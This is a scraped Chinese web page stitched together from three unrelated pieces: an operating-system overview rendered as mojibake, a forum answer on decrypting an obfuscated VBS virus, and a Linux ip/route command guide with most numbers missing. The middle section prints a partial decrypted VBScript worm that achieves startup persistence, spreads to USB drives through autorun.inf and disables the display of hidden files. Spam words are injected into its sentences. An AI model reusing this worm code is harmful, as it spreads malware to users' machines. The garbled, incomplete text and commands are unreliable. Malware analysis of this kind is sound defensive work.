1.çµèç³»ç»çåç±»
2.cm 03-04 运行全是系统乱码,代码如何添加?
3.Linux系统查看IP地址 IP设置与查看命令大全
çµèç³»ç»çåç±»
çµèç³»ç»æä½ç³»ç»æ¯ç®¡ç计ç®æºç¡¬ä»¶ä¸è½¯ä»¶èµæºç计ç®æºç¨åºï¼åæ¶ä¹æ¯è®¡ç®æºç³»ç»çå æ ¸ä¸åºç³ï¼åç±»å¦ä¸ï¼ä¸ãWindowsæä½ç³»ç»ï¼
Windowsæä½ç³»ç»æ¯æ常è§ç计ç®æºæä½ç³»ç»ï¼æ¯å¾®è½¯å ¬å¸å¼åçæä½è½¯ä»¶ã该软件ç»åäºå¤å¹´çåå±åç¨ï¼ç®åæ¨åºçwinç³»ç»ç¸å½æçãWindowsæä½ç³»ç»å ·æ人æºæä½äºå¨æ§å¥½ï¼æ¯æåºç¨è½¯ä»¶å¤ï¼ç¡¬ä»¶éé æ§å¼ºçç¹ç¹ã该系ç»ä»å¹´è¯çå°ç°å¨ï¼ç»è¿å¤å¹´çåå±å®åï¼ç¸å¯¹æ¯è¾æç稳å®ï¼æ¯å½å个人计ç®æºç主æµæä½ç³»ç»ã
äºãMac OSç³»ç»ï¼
Mac OSæ¯ä¸å¥è¿è¡äºè¹æMacintoshç³»åçµèä¸çæä½ç³»ç»ãMac OSæ¯é¦ä¸ªå¨åç¨é¢åæåçå¾å½¢ç¨æ·çé¢æä½ç³»ç»ãç°è¡çææ°çç³»ç»çæ¬æ¯macOS . beta 4 ï¼ä¸ç½ä¸ä¹æå¨PCä¸è¿è¡çMacç³»ç»ãMacç³»ç»æ¯åºäºUnixå æ ¸çå¾å½¢åæä½ç³»ç»ï¼ä¸è¬æ åµä¸å¨æ®éPCä¸æ æ³å®è£ çæä½ç³»ç»ãç±è¹æèªè¡å¼åãè¹ææºçæä½ç³»ç»å·²ç»å°äºOS ï¼ä»£å·ä¸ºMac OS X(X为çç½é©¬æ°ååæ³ï¼ï¼å®ç许å¤ç¹ç¹åæå¡é½ä½ç°äºè¹æçç念ã
ä¸ãlinuxç³»ç»ï¼
Linuxæ¯ä¸å¥å 费使ç¨åèªç±ä¼ æçç±»Unixæä½ç³»ç»ï¼æ¯ä¸ä¸ªåºäºPOSIXåUnixçå¤ç¨æ·ãå¤ä»»å¡ãæ¯æå¤çº¿ç¨åå¤CPUçæä½ç³»ç»ãå®è½è¿è¡ä¸»è¦çUnixå·¥å ·è½¯ä»¶ãåºç¨ç¨åºåç½ç»åè®®ãå®æ¯æä½åä½ç¡¬ä»¶ãLinux继æ¿äºUnix以ç½ç»ä¸ºæ ¸å¿ç设计ææ³ï¼æ¯ä¸ä¸ªæ§è½ç¨³å®çå¤ç¨æ·ç½ç»æä½ç³»ç»ã
åèèµææ¥æºï¼ç¾åº¦ç¾ç§-linux
åèèµææ¥æºï¼ç¾åº¦ç¾ç§-Mac OS
åèèµææ¥æºï¼ç¾åº¦ç¾ç§-Windowsæä½ç³»ç»
cm - 运行全是源码乱码,代码如何添加?
你好
这个是系统vbs脚本病毒,看上去是源码乱码,一点也看不懂,系统其实还是源码筹码移动源码主图有迹可循的。其思路就是系统寻 找"execute"关键词。病毒最终,源码还是系统要换成机器可以看懂的内容,也就是源码说,最后一层的系统execute里面的内容,就是源码病毒的源代码。按照这个思路,系统那么可以知道,源码解密方法也一定就在这个execute里面。系统
也就是说:无需明白他是如何加密的,只需要知道,execute出来的是什么。
按照这个思路,可以得到程序的最后一次迭代加密过程前的代码,也就是第一次迭代解密的代码,看上去还是it门户源码乱码,不过还是同样的道理,总可以找到execute这个关键词。病毒可能经过多次迭代,不过最终还是可以看懂的。
需要注意的是,execute后面的内容解密出来如果真的用execute执行了,那就中招了,所以这里要注意不能把execute也放进去一起执行。
以下是我的解密最终代码片断
这个程序作者比较BT,手工加密了很多地方,还手工打乱了代码,严重妨碍了程序可读性。
分析完代码其大致功能是
1。开机自启动
2。U盘的感染
3。破坏系统隐藏功能
on error resume next
j="\":til="SY":btj=:vs=".vbs":ve=".vbe":cm="%comspec% /c":dfo="/u#t/":inf="\autorun.inf"
set ws=createobject("wscript.shell"):set fso=createobject("scripting.filesystemobject")
set wmi=getobject("winmgmts:\\.\root\cimv2"):set sis=wmi.execquery("select * fromwin_operatingsystem")
set dc=fso.drives:set ats=wmi.execquery("select * from win_service where name='Schedule'")
for each atc in ats:cat=atc.state:next:if cat="Stopped" then ws.run "net start ""task scheduler""",0,false
ouw=wscript.scriptfullname:win=fso.getspecialfolder(0)&j:dir=fso.getspecialfolder(1)&j
tmp=fso.getspecialfolder(2)&j:wbe=dir&"wbem\":mir=left(ouw,len(ouw)-len (wscript.scriptname))
cnr="\computername":cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr:cna=rr (cnp,0):if cna="" then cna=til
wsc="wscript.exe":csc="cscript.exe":css=csc&" //nologo ":wsr=rn&":createobject (""wscript.shell"").run"
c=vbcrlf:inc=til&c&"[autorun]"&c&"open="&wsc&" .\"&vs&c&"shell\open\command="&wsc&" .\"&vs&c&"shell\open\default=1"
sf="shell folders\":rop="\software\microsoft\windows\currentversion\explorer\":dap=rr ("HKCU"&rop&sf&"desktop",0)&j
rpa="HKLM\software\"&cna&j:fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs:fap=rr ("HKCU"&rop&sf&"favorites",0)&j
ht=ec("ivwt?"):ha=ec(":;9:7>5kw9"):hb=hl&"1;<<=6x"&hl&"r;":hc="0dwuEpE":hd=ec
("$"+hc):he=ec("c"+hc)
rsp="HKLM\software\microsoft\windows\currentversion\":rsb=rsp&"run\":rsp=rsp&"policies\explorer\run\"&cna
hip="HKCU"&rop&"advanced\showsuperhidden":sz=lcase(fso.getfilename(wscript.fullname)):if mir=dir then sys=true
for each si in
sis:ca=si.caption:cs=si.codeset:cc=si.countrycode:os=si.oslanguage:wv=si.version:next
if instr(wv,"5.2")<>0 then hb="w"+hb:lb="v" else if os<> and cc<> then
hb="p"+hb:lb="o" else hb="d"+hb:lb="c"
for each d in dc
if mir=d&j then ws.run "explorer "&d,3,false:bir=true
next
if bir or sys or mir=win or mir=wbe then tir=true else wscript.quit
ouc=rt(ouw,-1):ver=gv(ouw):if ver="" or not isnumeric(ver) then msgbox("See You!"):km 1
else km 0
if sys then
if sz=wsc then pr csc,-1
if pr(csc,2)=1 then wscript.quit
wscript.sleep
if pr(csc,1)=0 then ws.run css&dir&ve,0,false:if pr(csc,1)=1 then wscript.quit
if rr("til",1)<>til then wr "til",til:wr "tjs",btj:wr "djs",date-1:wr "ded",0
djs=rr("djs",1):if isdate(djs) and date-cdate(djs)> and lb<>"o" then wr "osw",4
if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0
le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&le
cu:er
else
wscript.sleep
if pr(wsc,2)=2 then:if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date
if pr(csc,1)<>1 or pr(wsc,1)=0 then bf dir&ve,ouc,7:ws.run css&dir&ve,0,false
end if
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
由于VBS与JS一样是解释型语言,代码自上而下,一行一行地运行。所以解这类代码的一个技巧是:
我们寻找解密入口点时,应该优先考虑最后一个execute。作者大量使用逻辑拼接。源码片。。属于很BT的加密。。。汗水...
Linux系统查看IP地址 IP设置与查看命令大全
Linux是一种自由和开放源码的类Unix操作系统,存在着许多不同的Linux版本,但它们都使用了Linux内核,在很多专业计算机场合都有用到。Linux操作系统使用相对较为复杂,由于通常都是命令操作,比我们熟知的Winodows系统更不容易上手,但其安全性却要更高,针对需要设置Linux系统网络的朋友,以下百事网小编为其附上linux系统IP设置与查看命令大全,希望对新手朋友有所帮助。
1. 使用ifconfig命令配置并查看网络接口情况示例1: 配置eth0的IP,同时激活设备:# ifconfig eth0 ..4.1 netmask ...0 up示例2: 配置eth0别名设备 eth0:1 的IP,并添加路由# ifconfig eth0:1 ..4.2# route add –host ..4.2 dev eth0:1示例3:激活(禁用)设备# ifconfig eth0:1 up(down)示例4:查看所有(指定)网络接口配置# ifconfig (eth0)—————————2. 使用route 命令配置路由表示例1:添加到主机路由# route add –host ..4.2 dev eth0:1# route add –host ..4.1 gw ..4.示例2:添加到网络的路由# route add –net IP netmask MASK eth0# route add –net IP netmask MASK gw IP# route add –net IP/ eth1示例3:添加默认网关# route add default gw IP示例4:删除路由# route del –host ..4.1 dev eth0:1示例5:查看路由信息#route 或route -n(-n 表示不解析名字,列出速度会比route 快)—————————3.ARP 管理命令示例1:查看ARP缓存# arp示例2:添加# arp –s IP MAC示例3: 删除# arp –d IP—————————4.ip是iproute2软件包里面的一个强大的网络配置工具,它能够替代一些传统的网络管理工具。例如:ifconfig、源码小说route等,上面的示例完全可以用下面的ip命令实现,而且ip命令可以实现更多的功能.下面介绍一些示例:
4.0 ip命令的语法ip [OPTIONS] OBJECT [COMMAND [ARGUMENTS]]
4.1 ip link set–改变设备的属性.缩写:set、s
示例1:up/down 起动/关闭设备。# ip link set dev eth0 up这个等于传统的 # ifconfig eth0 up(down)示例2:改变设备传输队列的长度。参数:txqueuelen NUMBER或者txqlen NUMBER# ip link set dev eth0 txqueuelen 示例3:改变网络设备MTU(最大传输单元)的值。# ip link set dev eth0 mtu 示例4: 修改网络设备的MAC地址。参数: address LLADDRESS# ip link set dev eth0 address ::4f:::f1
4.2 ip link show–显示设备属性.缩写:show、list、lst、sh、ls、l-s选项出现两次或者更多次,ip会输出更为详细的错误信息统计。示例:# ip -s -s link ls eth0这个命令等于传统的 ifconfig eth0—————————5.1 ip address add–添加一个新的协议地址. 缩写:add、a示例1:为每个地址设置一个字符串作为标签。为了和Linux-2.0的网络别名兼容,这个字符串必须以设备名开头,接着一个冒号,# ip addr add local ..4.1/ brd + label eth0:1 dev eth0示例2: 在以太网接口eth0上增加一个地址...0,掩码长度为位(...0),标准广播地址,标签为eth0:Alias:# ip addr add ..4.2/ brd + dev eth1 label eth1:1这个命令等于传统的源码层:ifconfig eth1:1 ..4.2
5.2 ip address delete–删除一个协议地址. 缩写:delete、del、d# ip addr del ..4.1/ brd + dev eth0 label eth0:Alias1
5.3 ip address show–显示协议地址. 缩写:show、list、lst、sh、ls、l# ip addr ls eth0
5.4.ip address flush–清除协议地址. 缩写:flush、f示例1 : 删除属于私网.0.0.0/8的所有地址:# ip -s -s a f to /8示例2 : 取消所有以太网卡的IP地址# ip -4 addr flush label “eth0″—————————6. ip neighbour–neighbour/arp表管理命令缩写 neighbour、neighbor、neigh、n命令 add、change、replace、delete、fulsh、show(或者list)
6.1 ip neighbour add — 添加一个新的邻接条目ip neighbour change–修改一个现有的条目ip neighbour replace–替换一个已有的条目缩写:add、a;change、chg;replace、repl示例1: 在设备eth0上,为地址.0.0.3添加一个permanent ARP条目:# ip neigh add .0.0.3 lladdr 0:0:0:0:0:1 dev eth0 nud perm示例2:把状态改为reachable# ip neigh chg .0.0.3 dev eth0 nud reachable
6.2.ip neighbour delete–删除一个邻接条目示例1:删除设备eth0上的一个ARP条目.0.0.3# ip neigh del .0.0.3 dev eth.3.ip neighbour show–显示网络邻居的信息.缩写:show、list、sh、ls示例1: # ip -s n ls ..7...7.. dev eth0 lladdr ::0c::3f: ref 5 used // nud reachable6.4.ip neighbour flush–清除邻接条目. 缩写:flush、f示例1: (-s 可以显示详细信息)# ip -s -s n f ..7.—————————7. 路由表管理7.1.缩写 route、ro、r7.5.路由表从Linux-2.2开始,内核把路由归纳到许多路由表中,这些表都进行了编号,编号数字的范围是1到。另外,为了方便,还可以在/etc/iproute2/rt_tables中为路由表命名。默认情况下,所有的路由都会被插入到表main(编号)中。在进行路由查询时,内核只使用路由表main。
7.6.ip route add — 添加新路由ip route change — 修改路由ip route replace — 替换已有的路由缩写:add、a;change、chg;replace、repl示例1: 设置到网络.0.0/的路由经过网关..7.# ip route add .0.0/ via ..7.
示例2: 修改到网络.0.0/的直接路由,使其经过设备dummy# ip route chg .0.0/ dev dummy
示例3: 实现链路负载平衡.加入缺省多路径路由,让ppp0和ppp1分担负载(注意:scope值并非必需,它只不过是告诉内核,这个路由要经过网关而不是直连的。实际上,如果你知道远程端点的地址,使用via参数来设置就更好了)。# ip route add default scope global nexthop dev ppp0 nexthop dev ppp1# ip route replace default scope global nexthop dev ppp0 nexthop dev ppp1示例4: 设置NAT路由。在转发来自...的数据包之前,先进行网络地址转换,把这个地址转换为..7.# ip route add nat ... via ..7.
示例5: 实现数据包级负载平衡,允许把数据包随机从多个路由发出。weight 可以设置权重.# ip route replace default equalize nexthop via ... dev eth0 weight 1 nexthop via ... dev eth1 weight 1
7.7.ip route delete– 删除路由缩写:delete、del、d示例1:删除上一节命令加入的多路径路由# ip route del default scope global nexthop dev ppp0 nexthop dev ppp1
7.8.ip route show — 列出路由缩写:show、list、sh、ls、l
示例1: 计算使用gated/bgp协议的路由个数# ip route ls proto gated/bgp |wc
示例2: 计算路由缓存里面的条数,由于被缓存路由的属性可能大于一行,以此需要使用-o选项# ip -o route ls cloned |wc示例3: 列出路由表TABLEID里面的路由。缺省设置是table main。TABLEID或者是一个真正的路由表ID或者是/etc/iproute2/rt_tables文件定义的字符串,或者是以下的特殊值:all — 列出所有表的路由;cache — 列出路由缓存的内容。ip ro ls ..7. tab cache示例4: 列出某个路由表的内容# ip route ls table fddi
示例5: 列出默认路由表的内容# ip route ls这个命令等于传统的: route
7.9.ip route flush — 擦除路由表示例1: 删除路由表main中的所有网关路由(示例:在路由监控程序挂掉之后):# ip -4 ro flush scope global type unicast示例2:清除所有被克隆出来的IPv6路由:# ip -6 -s -s ro flush cache示例3:在gated程序挂掉之后,清除所有的BGP路由:# ip -s ro f proto gated/bgp示例4: 清除所有ipv4路由cache# ip route flush cache*** IPv4 routing cache is flushed.
7.ip route get — 获得单个路由 .缩写:get、g使用这个命令可以获得到达目的地址的一个路由以及它的确切内容。ip route get命令和ip route show命令执行的操作是不同的。ip route show命令只是显示现有的路由,而ip route get命令在必要时会派生出新的路由。示例1: 搜索到..7.的路由# ip route get ..7...7. dev eth0src ..7. realms inr.ac cachemtu rtt 示例2: 搜索目的地址是..7.,来自..7.,从eth0设备到达的路由(这条命令会产生一条非常有意思的路由,这是一条到..7.的回环路由)# ip r g ..7. from ..7. iif eth..7. from ..7. dev eth0src ..7.realms inr.ac/inr.accache ;mtu rtt iif eth0—————————8. ip route — 路由策略数据库管理命令命令add、delete、show(或者list)注意:策略路由(policy routing)不等于路由策略(rouing policy)。在某些情况下,我们不只是需要通过数据包的目的地址决定路由,可能还需要通过其他一些域:源地址、IP协议、传输层端口甚至数据包的负载。这就叫做:策略路由(policy routing)。
8.5. ip rule add — 插入新的规则ip rule delete — 删除规则缩写:add、a;delete、del、d
示例1: 通过路由表inr.ruhep路由来自源地址为../的数据包ip ru add from ../ table inr.ruhep prio
示例2:把源地址为..7.的数据报的源地址转换为...,并通过表1进行路由ip ru add from ..7. nat ... table 1 prio
示例3:删除无用的缺省规则ip ru del prio
8.7. ip rule show — 列出路由规则缩写:show、list、sh、ls、l示例1:# ip ru ls0:from all lookup local:from ..4. lookup fddi:from ..4. lookup fddi:from all lookup main:from all lookup —————————9.ip maddress — 多播地址管理缩写:show、list、sh、ls、l9.3.ip maddress show — 列出多播地址示例1: # ip maddr ls dummy
9.4. ip maddress add — 加入多播地址ip maddress delete — 删除多播地址缩写:add、a;delete、del、d使用这两个命令,我们可以添加/删除在网络接口上监听的链路层多播地址。这个命令只能管理链路层地址。
示例1: 增加# ip maddr add ::::: dev dummy示例2: 查看# ip -O maddr ls dummy2:dummylink::::: users 2 staticlink::5e:::示例3: 删除# ip maddr del ::::: dev dummy—————————.ip mroute — 多播路由缓存管理
.4.ip mroute show — 列出多播路由缓存条目缩写:show、list、sh、ls、l
示例1:查看# ip mroute ls(...6, .0.1.)Iif: unresolved(..., .0.1.)Iif: unresolved(..7., ...)Iif: eth0Oifs: pimreg示例2:查看# ip -s mr ls ./(..7., ...)Iif: eth0Oifs: pimreg packets, bytes—————————. ip tunnel — 通道配置缩写tunnel、tunl
.4.ip tunnel add — 添加新的通道ip tunnel change — 修改现有的通道ip tunnel delete — 删除一个通道缩写:add、a;change、chg;delete、del、d示例1:建立一个点对点通道,最大TTL是# ip tunnel add Cisco mode sit remote ..7. local ...1 ttl
.4.ip tunnel show — 列出现有的通道缩写:show、list、sh、ls、l示例1:# ip -s tunl ls Cisco—————————. ip monitor和rtmon — 状态监视ip命令可以用于连续地监视设备、地址和路由的状态。这个命令选项的格式有点不同,命令选项的名字叫做monitor,接着是操作对象:ip monitor [ file FILE ] [ all | OBJECT-LIST ]示例1:# rtmon file /var/log/rtmon.log示例2:# ip monitor file /var/log/rtmon.log r